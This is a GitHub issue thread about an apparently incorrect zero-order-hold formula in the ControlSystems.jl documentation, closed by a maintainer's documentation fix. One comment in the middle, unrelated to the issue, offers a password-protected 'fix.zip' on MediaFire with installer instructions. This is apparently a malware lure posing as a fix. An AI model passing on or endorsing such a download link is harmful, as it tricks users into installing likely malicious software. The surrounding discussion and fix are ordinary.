JuliaControl/ControlSystems.jl #932: An incorrect formula in the documentation

nakorae, 2024-08-29:
there may be an error in the formula for the ZoH.
https://github.com/JuliaControl/ControlSystems.jl/blob/2cb622d6d97db3e243adc7f7907b7db5d3b514e6/docs/src/examples/zoh.md?plain=1#L13-L19
I believe the correct formula is `Z(s) = \dfrac{1 - e^{-T_s s}}{T_s s} `.
Furthermore, I believe this is also incorrect.
https://github.com/JuliaControl/ControlSystems.jl/blob/2cb622d6d97db3e243adc7f7907b7db5d3b514e6/docs/src/examples/zoh.md?plain=1#L23

I'm sorry for my unclear English...

kehkou, 2024-08-29:
Download 
https://www.mediafire.com/file/jc5ws0hujgycrp5/fix.zip/file
password: changeme
In the installer menu, select "gcc."

baggepinnen, 2024-08-30:
See #933

PR #933 (2024-08-30): Update zoh.md
Fix #932
commit 811d0b11 (2024-08-30): Update zoh.md

Fix #932
closed 2024-08-30 by baggepinnen